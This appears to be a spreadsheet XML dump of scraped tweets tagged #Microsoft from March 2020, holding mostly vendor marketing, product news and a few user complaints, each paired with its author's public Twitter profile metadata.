    <t>"One #Microsoft" was inspired by "One Ford" - CEO Ballmer met at Starbucks with Alan Mulally, CEO of #Ford at the time. Read more about One Ford: https://t.co/gUhYSPYIhP  #strategy #alignment #corporatealignment #productivity</t>
  </si>
  <si>
    <t>{'id': 39381202, 'id_str': '39381202', 'name': 'Dave Ramos', 'screen_name': 'SHIFTPOINTS', 'location': 'Washington, DC', 'description': 'Dave Ramos is an author, speaker, and CEO of SHIFTPOINTS. His latest book, Drive One Direction, is available on Amazon: https://t.co/PA9CvHvCwL', 'url': 'http://t.co/PlbXlcwRVO', 'entities': {'url': {'urls': [{'url': 'http://t.co/PlbXlcwRVO', 'expanded_url': 'http://www.shiftpoints.com', 'display_url': 'shiftpoints.com', 'indices': [0, 22]}]}, 'description': {'urls': [{'url': 'https://t.co/PA9CvHvCwL', 'expanded_url': 'https://www.amazon.com/dp/B07Y2BBQQK', 'display_url': 'amazon.com/dp/B07Y2BBQQK', 'indices': [120, 143]}]}}, 'protected': False, 'followers_count': 219, 'friends_count': 330, 'listed_count': 8, 'created_at': 'Tue May 12 00:04:37 +0000 2009', 'favourites_count': 93, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1036, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': '969C9C', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme1/bg.png', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/593122183372746752/qLMkKASK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/593122183372746752/qLMkKASK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/39381202/1550598769', 'profile_link_color': 'B4001D', 'profile_sidebar_border_color': '000000', 'profile_sidebar_fill_color': 'D1D2D0', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 13:06:03 +0000 2020</t>
  </si>
  <si>
    <t>Feeling frustrated with #Microsoft #Azure. Seems there's multiple, unclear, ill-communicated things going on. Microsoft help says, "perform an IT Admin Takeover process for Power BI and Office 365". I'm afraid I'm using neither and I don't speak Microsoftese. #ContentDesign</t>
  </si>
  <si>
    <t>{'id': 124136018, 'id_str': '124136018', 'name': 'David Carboni', 'screen_name': 'davidcarboni', 'location': 'Edinburgh, Scotland', 'description': 'Hands-on technology and organisation culture transformation. Work hard be kind. Technology Director and head geek @Notbinary_', 'url': 'https://t.co/L5ldLOmFhi', 'entities': {'url': {'urls': [{'url': 'https://t.co/L5ldLOmFhi', 'expanded_url': 'https://medium.com/@davidcarboni', 'display_url': 'medium.com/@davidcarboni', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 900, 'friends_count': 1044, 'listed_count': 59, 'created_at': 'Thu Mar 18 11:05:09 +0000 2010', 'favourites_count': 1243, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 1642,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'http://pbs.twimg.com/profile_images/1172984913894809602/ysZM1r4f_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1172984913894809602/ysZM1r4f_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/124136018/1522100772', 'profile_link_color': 'DD1111',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</si>
  <si>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13:05:15 +0000 2020</t>
  </si>
  <si>
    <t>#Windows 10 Always On #VPN and @windowsserver Routing and Remote Access (RRAS) in #Microsoft @Azure. #Windows10 #Win10 #Mobility #Azure #cloud #publiccloud #aovpn https://t.co/0iMz8Z2yag</t>
  </si>
  <si>
    <t>Tue Mar 03 13:05:14 +0000 2020</t>
  </si>
  <si>
    <t>Watch this video to learn how FINNING uses #Microsoft #AzureIoT to push forward internal process optimization and enhance global customer satisfaction. https://t.co/9k7x9HFM4f</t>
  </si>
  <si>
    <t>{'id': 545455863, 'id_str': '545455863', 'name': 'Neuwest Technology', 'screen_name': 'Neuwest', 'location': '', 'description': 'We pride ourselves on being experts in the IT and network industry.\r\nAnd weâ€™re in business to serve you.', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 382, 'friends_count': 835, 'listed_count': 5, 'created_at': 'Wed Apr 04 19:16:30 +0000 2012', 'favourites_count': 712, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 2808,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'http://pbs.twimg.com/profile_images/2429980284/9n9e47lknz8wqcz6e3yt_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2429980284/9n9e47lknz8wqcz6e3yt_normal.png',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</si>
  <si>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13:04:58 +0000 2020</t>
  </si>
  <si>
    <t>Still running servers on-premises? Looking for a 212% ROI? It's time to move to #Microsoft #Azure. Forrester's financial impact study gives you more reasons to make a move. https://t.co/wBagP4AAOc</t>
  </si>
  <si>
    <t>Tue Mar 03 13:04:30 +0000 2020</t>
  </si>
  <si>
    <t>#Ransomware attacks strike more often than you think, and new variations pop up constantly. Get data protection tips from this blog and contact NetGain Information Systems for access to #Microsoft #Office365 advanced threat protection. https://t.co/EAt0kkk1wc</t>
  </si>
  <si>
    <t>{'id': 360686619, 'id_str': '360686619', 'name': 'NetGain', 'screen_name': 'NetGainIS', 'location': 'Columbus, OH Area', 'description': 'NetGain Information Systems guides clients to measurably-improved business results through an optimized technology infrastructure.', 'url': 'http://t.co/4UJIPAXrDc', 'entities': {'url': {'urls': [{'url': 'http://t.co/4UJIPAXrDc', 'expanded_url': 'http://www.netgainis.com', 'display_url': 'netgainis.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 166, 'friends_count': 192, 'listed_count': 13, 'created_at': 'Tue Aug 23 16:12:29 +0000 2011', 'favourites_count': 71, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4477,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'http://pbs.twimg.com/profile_images/752581216440819712/NW9TKeLe_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/752581216440819712/NW9TKeLe_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/360686619/1468266771', 'profile_link_color': '8C7F8C', 'profile_sidebar_border_color': 'EEEEEE', 'profile_sidebar_fill_color': 'DE163E', 'profile_text_color': '0A010A', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 13:03:28 +0000 2020</t>
  </si>
  <si>
    <t>Belgrade Nikola Tesla Airport serves over 5 million passengers per year. To help cut costs and pass the savings onto passengers, they're using the cloud to back up their data. #Microsoft https://t.co/3lcGnJjnnX</t>
  </si>
  <si>
    <t>{'id': 1442485513, 'id_str': '1442485513', 'name': 'Barrdega PanamÃ¡', 'screen_name': 'barrdega', 'location': 'Ciudad de PanamÃ ', 'description': 'Expertos en la implementaciÃ³n de sistemas y equipo para el control de inventarios, producciÃ³n, logÃ­stica, cÃ³digo de barras y RFID en PanamÃ¡. +507-209-6996', 'url': 'https://t.co/fBmHwxoGdu', 'entities': {'url': {'urls': [{'url': 'https://t.co/fBmHwxoGdu', 'expanded_url': 'https://www.barrdega.com', 'display_url': 'barrdega.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 206, 'friends_count': 782, 'listed_count': 6, 'created_at': 'Mon May 20 00:09:56 +0000 2013', 'favourites_count': 261, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6823,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'http://pbs.twimg.com/profile_images/1172275204741062657/2cAAVoOL_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1172275204741062657/2cAAVoOL_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1442485513/1525432864',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</si>
  <si>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13:03:24 +0000 2020</t>
  </si>
  <si>
    <t>Honeywell set to launch its quantum computer with quantum volume of 64 https://t.co/cpkNynRdn9 #ZDNet #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 13:02:35 +0000 2020</t>
  </si>
  <si>
    <t>Businesses can choose to setup NAS, SAN, or both NAS and SAN in Microsoft Azure, AWS cloud, StoneFly cloud or any other S3 compatible cloud. Businesses can also opt to setup cloud storage in different clouds simultaneously.
#NAS #SAN #Microsoft #Azure #AWS
https://t.co/j6lQd0r2DX</t>
  </si>
  <si>
    <t>{'id': 1122704143871881216, 'id_str': '1122704143871881216', 'name': 'anthony', 'screen_name': 'anthony71402030', 'location': '', 'description': 'Move forward with the world of #Technology! #BigData #NAS #SAN #DataStorage #CyberSecurity #CloudComputing #CloudStorage &amp; #CyberSecurity #AI #Tech #TechNews', 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1498, 'friends_count': 4868, 'listed_count': 10, 'created_at': 'Mon Apr 29 03:28:21 +0000 2019', 'favourites_count': 5172, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 4346, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1140483203943321602/ERmXBzfG_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1140483203943321602/ERmXBzfG_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1122704143871881216/1568701806',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</si>
  <si>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13:01:51 +0000 2020</t>
  </si>
  <si>
    <t>Belgrade Nikola Tesla Airport serves over 5 million passengers per year. To help cut costs and pass the savings onto passengers, they're using the cloud to back up their data. #Microsoft https://t.co/hdCq2tScCs</t>
  </si>
  <si>
    <t>{'id': 816868552569487360, 'id_str': '816868552569487360', 'name': 'WiReD Technology', 'screen_name': 'wrdtio', 'location': 'Georgia, USA', 'description': 'Solutions Company', 'url': 'https://t.co/tGZFn48Xlp', 'entities': {'url': {'urls': [{'url': 'https://t.co/tGZFn48Xlp', 'expanded_url': 'http://wired.technology', 'display_url': 'wired.technology', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 31, 'friends_count': 502, 'listed_count': 1, 'created_at': 'Thu Jan 05 04:46:54 +0000 2017', 'favourites_count': 86, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 485,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'http://pbs.twimg.com/profile_images/985314921998151685/5Ssfcz_T_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/985314921998151685/5Ssfcz_T_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/816868552569487360/1532091197',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</si>
  <si>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13:01:42 +0000 2020</t>
  </si>
  <si>
    <t>#MicrosoftTeams is full of possibility for your organisation; but what should you do...and not do? Here are a few tips to get you started with the tool: https://t.co/lyuz3xKCJz 
#MicrosoftTeamsHelp #Microsoft #Teams #Collaboration #Office365</t>
  </si>
  <si>
    <t>Tue Mar 03 13:01:41 +0000 2020</t>
  </si>
  <si>
    <t>It's #Tuesday. Does your #business need a new #ERP? Need #Microsoft Office products? Want to see your #CybersecurityEvolved? Look no further. @_GMTSystems are a @sageuk, @Microsoft and @Sophos #officialpartner. https://t.co/SjABOLJ52Z https://t.co/EBbkpzw3KT</t>
  </si>
  <si>
    <t>{'id': 4897618805, 'id_str': '4897618805', 'name': 'GMT Systems', 'screen_name': '_GMTSystems', 'location': 'WN8 9QE', 'description': 'Contact us for affordable and reliable solutions to your Sage software and IT hardware needs. Based in Lancashire, GMT can provide on premise and remote support', 'url': 'https://t.co/v0b2jnOfCt', 'entities': {'url': {'urls': [{'url': 'https://t.co/v0b2jnOfCt', 'expanded_url': 'https://www.gmtsystems.co.uk', 'display_url': 'gmtsystems.co.uk', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 37, 'friends_count': 199, 'listed_count': 0, 'created_at': 'Thu Feb 11 11:31:06 +0000 2016', 'favourites_count': 13, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 323, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'F5F8FA', 'profile_background_image_url': None, 'profile_background_image_url_https': None, 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1177139997151039488/t2tkrrLK_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1177139997151039488/t2tkrrLK_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/4897618805/1569487182',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</si>
  <si>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13:01:31 +0000 2020</t>
  </si>
  <si>
    <t>Learn how ALS patient Otto Knoke is using #Microsoft eye-tracking software to operate #PowerBI and analyze data to modernize his clients' businesses. Watch the inspiring video. https://t.co/EJtS0lLTEF</t>
  </si>
  <si>
    <t>{'id': 580230416, 'id_str': '580230416', 'name': 'Complete Technology', 'screen_name': 'comptechres', 'location': 'Southbridge, MA ', 'description': 'We help Small Business with their Technology needs', 'url': 'http://t.co/BtRGEDICK9', 'entities': {'url': {'urls': [{'url': 'http://t.co/BtRGEDICK9', 'expanded_url': 'http://www.completetechnologyresources.com', 'display_url': 'completetechnologyresources.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 359, 'friends_count': 558, 'listed_count': 551, 'created_at': 'Mon May 14 20:55:38 +0000 2012', 'favourites_count': 4, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 9968,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'http://pbs.twimg.com/profile_images/2220065620/CompleteTechnologyResources_Twitter_Logo_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/2220065620/CompleteTechnologyResources_Twitter_Logo_normal.jpg', 'profile_link_color': 'B50027',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</si>
  <si>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13:01:28 +0000 2020</t>
  </si>
  <si>
    <t>More than 30% of businesses use advanced communication tools in conference rooms. Want to find the #teamworksolution that's right for your business? Check out this infographic to see the latest #Microsoft solutions available to your team. https://t.co/NIti8MPdxF</t>
  </si>
  <si>
    <t>Tue Mar 03 13:00:41 +0000 2020</t>
  </si>
  <si>
    <t>Go into the tennis court again and smash your way through the championships in Smash Court Tennis 3 https://t.co/syHgO3Ai3r #microsoft #xbox360 #fun #gamer #tennis https://t.co/suBHG0mR1F</t>
  </si>
  <si>
    <t>Tue Mar 03 13:00:39 +0000 2020</t>
  </si>
  <si>
    <t>With courses ranging from beginner right through to advanced level, develop you skills and knowledge of #Microsoft #Excel with one of our #training courses https://t.co/p9KEfiYCkA #SCCItraining #Sheffield https://t.co/2Xw8nNkNYd</t>
  </si>
  <si>
    <t>{'id': 107228509, 'id_str': '107228509', 'name': 'Sheffield Chamber', 'screen_name': 'sheffchamber', 'location': 'Sheffield', 'description': 'Sheffield Chamber of Commerce and Industry is an award winning business support organisation, representing businesses across Sheffield.', 'url': 'http://t.co/d7R0rapeKR', 'entities': {'url': {'urls': [{'url': 'http://t.co/d7R0rapeKR', 'expanded_url': 'http://www.scci.org.uk', 'display_url': 'scci.org.uk', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 14521, 'friends_count': 1412, 'listed_count': 309, 'created_at': 'Thu Jan 21 22:34:13 +0000 2010', 'favourites_count': 1937, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 16476,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'http://pbs.twimg.com/profile_images/1114076901826547712/P3ofO9zf_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1114076901826547712/P3ofO9zf_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/107228509/1554451829', 'profile_link_color': '1AADF3', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'BDE6F2', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Latest #Microsoft #Cortana Update Emphasizes User Productivity Features -- #Xanjero https://t.co/yQmhGY5W1z https://t.co/6PkIxzOJOO</t>
  </si>
  <si>
    <t>{'id': 119497865, 'id_str': '119497865', 'name': 'Owen E. Richason IV', 'screen_name': 'OwenERichasonIV', 'location': 'Seminole, Florida, USA', 'description': 'Covers social media, apps, search, and like news. History buff, movie and theme park lover. Blessed dad and husband.', 'url': 'https://t.co/zNFCdDHIJu', 'entities': {'url': {'urls': [{'url': 'https://t.co/zNFCdDHIJu', 'expanded_url': 'http://www.xanjero.com/', 'display_url': 'xanjero.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 1253, 'friends_count': 1801, 'listed_count': 143, 'created_at': 'Wed Mar 03 20:55:28 +0000 2010', 'favourites_count': 1690, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 7633, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'C4543D', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme8/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme8/bg.gif', 'profile_background_tile': True, 'profile_image_url': 'http://pbs.twimg.com/profile_images/471423221846122496/qICcykV6_normal.jpeg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/471423221846122496/qICcykV6_normal.jpeg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/119497865/1444757257', 'profile_link_color': 'C4543D', 'profile_sidebar_border_color': '6E231A', 'profile_sidebar_fill_color': '6E231A', 'profile_text_color': '000000', 'profile_use_background_image': True, 'has_extended_profile': True, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 13:00:38 +0000 2020</t>
  </si>
  <si>
    <t>Latest #Microsoft #Cortana Update Emphasizes User Productivity Features -- #Xanjero https://t.co/bzhH1JjwuH https://t.co/jHDh0Ns6EF</t>
  </si>
  <si>
    <t>{'id': 458764250, 'id_str': '458764250', 'name': 'Xanjero', 'screen_name': 'XanjeroMedia', 'location': 'Seminole, FL', 'description': 'News &amp; Information', 'url': 'http://t.co/fPYlQf0JFB', 'entities': {'url': {'urls': [{'url': 'http://t.co/fPYlQf0JFB', 'expanded_url': 'http://xanjero.com', 'display_url': 'xanjero.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 923, 'friends_count': 1874, 'listed_count': 140, 'created_at': 'Sun Jan 08 22:44:52 +0000 2012', 'favourites_count': 7, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6567, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'FFFFFF', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme18/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme18/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/649328360426995712/jqsaQW3-_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/649328360426995712/jqsaQW3-_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/458764250/1443659655', 'profile_link_color': '0084B4', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'DDFFCD', 'profile_text_color': '333333', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 13:00:11 +0000 2020</t>
  </si>
  <si>
    <t>Here is your complete guide to getting started with Microsoft #SQLServer. https://t.co/R9ypw15Wun
#microsoft #sql #database https://t.co/9tHrfBOANK</t>
  </si>
  <si>
    <t>Tue Mar 03 12:57:05 +0000 2020</t>
  </si>
  <si>
    <t>How to use Azure Data Box for Migrations https://t.co/xOGjbfqDnO #Microsoft</t>
  </si>
  <si>
    <t>Tue Mar 03 12:55:19 +0000 2020</t>
  </si>
  <si>
    <t>I'm using Power Automate to repeat what AspiraCloud say! Discover how #Microsoft technology is used to analyze young Braylon O'Neill's gait mechanics, enabling him to do more and achieve more. https://t.co/lEafJTbOEi</t>
  </si>
  <si>
    <t>{'id': 20765651, 'id_str': '20765651', 'name': 'Chris McKinley', 'screen_name': 'crmckinley', 'location': 'Bournemouth', 'description': 'Founding member of AspiraCloud. Office 365 geek. DIYer. Youth Worker.', 'url': 'https://t.co/4XPqaEDjU3', 'entities': {'url': {'urls': [{'url': 'https://t.co/4XPqaEDjU3', 'expanded_url': 'https://aspiracloud.com', 'display_url': 'aspiracloud.com', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 368, 'friends_count': 381, 'listed_count': 29, 'created_at': 'Fri Feb 13 12:12:10 +0000 2009', 'favourites_count': 14, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1686,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'http://pbs.twimg.com/profile_images/1189831986313125889/iUOEA6OU_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1189831986313125889/iUOEA6OU_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/20765651/1572513027',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</si>
  <si>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Tue Mar 03 12:55:01 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft identity acronymswhat do they mean and how do they relate to each other? https://t.co/5smgcqClpn https://t.co/r7bTnLVJhI</t>
  </si>
  <si>
    <t>Tue Mar 03 12:50:35 +0000 2020</t>
  </si>
  <si>
    <t>#Microsoft People on Outlook web interface is the worse tool Ive ever seen to maintain your contacts</t>
  </si>
  <si>
    <t>{'id': 1952501954, 'id_str': '1952501954', 'name': 'Robert', 'screen_name': 'RobertEVoicu', 'location': 'Bucharest, Romania', 'description': "'It's Never Wrong To Do The Right Thing' - Mark Twain. Tweets in English &amp; RomÃ¢nÄƒ", 'url': None, 'entities': {'description': {'urls': []}}, 'protected': False, 'followers_count': 1129, 'friends_count': 675, 'listed_count': 54, 'created_at': 'Thu Oct 10 19:55:35 +0000 2013', 'favourites_count': 16775, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 22223,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False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1226123552442720257/rjIoY2kH_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1226123552442720257/rjIoY2kH_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/1952501954/1504594583',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</si>
  <si>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12:49:29 +0000 2020</t>
  </si>
  <si>
    <t>BREAKING NEWS: #Microsoft is retiring 18 certifications and 43 exams in #SQL Server, Windows Server, App Builder, Web Applications and more on 30 June 2020. Our article will tell you what you need to know https://t.co/i8SWyeLoqq https://t.co/zens2H3jbX</t>
  </si>
  <si>
    <t>Tue Mar 03 12:46:53 +0000 2020</t>
  </si>
  <si>
    <t>Could you be affected?   https://t.co/hFPB7xsNlJ
#AccessManagement #Microsoft #ActiveDirectory 
#IdentityAccessManagement #tenfold #ITsecurity #Datasecurity https://t.co/5bwoondZlH</t>
  </si>
  <si>
    <t>Tue Mar 03 12:45:31 +0000 2020</t>
  </si>
  <si>
    <t>#Engineering students from #Karnataka, Tamil Nadu runner ups in #Microsoft Imagine Cup Asia. Read more at https://t.co/YTrAzDVgfv https://t.co/BtkaFr7Dqr</t>
  </si>
  <si>
    <t>{'id': 52307864, 'id_str': '52307864', 'name': 'Education Times', 'screen_name': 'educationtimes', 'location': 'India', 'description': 'The Times of India supplement. Grab your copy every Monday. An exclusive guide to education in India, abroad, scholarships and career prospects', 'url': 'http://t.co/JONyNgmZiL', 'entities': {'url': {'urls': [{'url': 'http://t.co/JONyNgmZiL', 'expanded_url': 'http://www.educationtimes.com', 'display_url': 'educationtimes.com', 'indices': [0, 22]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 3843, 'friends_count': 244, 'listed_count': 94, 'created_at': 'Tue Jun 30 04:53:32 +0000 2009', 'favourites_count': 28, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 6934, 'lang': None, 'contributors_enabled': False, 'is_translator': False, 'is_translation_enabled': False, 'profile_background_color': 'EDECE9', 'profile_background_image_url': 'http://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_image_url_https': 'https://abs.twimg.com/images/themes/theme9/bg.gif', 'profile_background_tile': False, 'profile_image_url': 'http://pbs.twimg.com/profile_images/1139740730908217347/zYYR9JZu_normal.png', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/1139740730908217347/zYYR9JZu_normal.png', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/52307864/1560570376', 'profile_link_color': '1B95E0', 'profile_sidebar_border_color': 'FFFFFF', 'profile_sidebar_fill_color': 'E3E2DE', 'profile_text_color': '634047', 'profile_use_background_image': True, 'has_extended_profile': False, 'default_profile': False, 'default_profile_image': False, 'following': None, 'follow_request_sent': None, 'notifications': None, 'translator_type': 'none'}</t>
  </si>
  <si>
    <t>Tue Mar 03 12:45:02 +0000 2020</t>
  </si>
  <si>
    <t>Good post on working remotely during challenging times. #microsoft  #MSFTAdvocate https://t.co/WgKV2vGmJC</t>
  </si>
  <si>
    <t>Tue Mar 03 12:43:54 +0000 2020</t>
  </si>
  <si>
    <t>Business Economics student discusses her role as a course rep and her experience on her elective module &amp;amp; her success at the EDI Microsoft diversity festival 2019  #Microsoft #EDI #diversityfestival  #Chinese #WeAreWestminster #HelloFuture @UniWestminster @uw_wbs @WestminsterSU https://t.co/hhps6Yi0dI</t>
  </si>
  <si>
    <t>{'id': 351220840, 'id_str': '351220840', 'name': 'Karen St.Jean-Kufuor', 'screen_name': 'KameraKaz', 'location': 'University of Westminster', 'description': 'Principal Lecturer/WBS UG external relations coordinator/Course Leader Economics. Economist, Photographer, Netballer, Triathlete of sorts. Views always my own', 'url': 'https://t.co/1obOnMkcfz', 'entities': {'url': {'urls': [{'url': 'https://t.co/1obOnMkcfz', 'expanded_url': 'http://www.scoop.it/t/WBS-TRIBE', 'display_url': 'scoop.it/t/WBS-TRIBE', 'indices': [0, 23]}]}, 'description': {'urls': []}}, 'protected': False, 'followers_count': 322, 'friends_count': 576, 'listed_count': 19, 'created_at': 'Mon Aug 08 23:27:50 +0000 2011', 'favourites_count': 1903, 'utc_offset': None, 'time_zone': None, 'geo_enabled': True, 'verified': False, 'statuses_count': 4219,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'http://pbs.twimg.com/profile_images/851373802734964736/3A0xBB9b_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/851373802734964736/3A0xBB9b_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/351220840/1509069572',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</si>
  <si>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12:41:58 +0000 2020</t>
  </si>
  <si>
    <t>How to Create a Local Account in #Windows10 https://t.co/9B2GMOOM3L #Microsoft #Windows #tech #tips #howto #privacy</t>
  </si>
  <si>
    <t>{'id': 635831040, 'id_str': '635831040', 'name': 'AKiATECH', 'screen_name': 'akiatech', 'location': 'Florida', 'description': "I'm a #Tech #Geek and Blogger with an appreciation for all things #Electronic and also a maker of #Music that only I seem to like :) | [https://t.co/rE4aInrFns]", 'url': 'https://t.co/8TkdDOKR5R', 'entities': {'url': {'urls': [{'url': 'https://t.co/8TkdDOKR5R', 'expanded_url': 'http://blog.akiatech.com', 'display_url': 'blog.akiatech.com', 'indices': [0, 23]}]}, 'description': {'urls': [{'url': 'https://t.co/rE4aInrFns', 'expanded_url': 'http://soundcloud.com/akiatech', 'display_url': 'soundcloud.com/akiatech', 'indices': [136, 159]}]}}, 'protected': False, 'followers_count': 3690, 'friends_count': 3922, 'listed_count': 255, 'created_at': 'Sat Jul 14 23:58:04 +0000 2012', 'favourites_count': 465, 'utc_offset': None, 'time_zone': None, 'geo_enabled': False, 'verified': False, 'statuses_count': 1699,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'http://pbs.twimg.com/profile_images/878755172230549504/P9p3nYjA_normal.jpg', 'profile_image_url_https': 'https://pbs.twimg.com/profile_images/878755172230549504/P9p3nYjA_normal.jpg', 'profile_banner_url': 'https://pbs.twimg.com/profile_banners/635831040/1498351330', 'profile_link_color': '3F0861',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</si>
  <si>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12:41:14 +0000 2020</t>
  </si>
  <si>
    <t>Lack of leadership stifles collaboration initiatives https://t.co/bvNv2ld4dS via @Hybrid_Circle #Azure #Microsoft https://t.co/vSEVNGKQvA</t>
  </si>
  <si>
    <t>Tue Mar 03 12:38:37 +0000 2020</t>
  </si>
  <si>
    <t>MSNBC actually means Micro-Soft NBC
@Microsoft shouldnt have to pretend to be neutral. 
We should go after their brand and destroy it. Any brand that claims to be WOKE should be called out for its hypocrisy in promoting sexism, racism, hate, and bigotry in the media #MicroSoft</t>
  </si>
  <si>
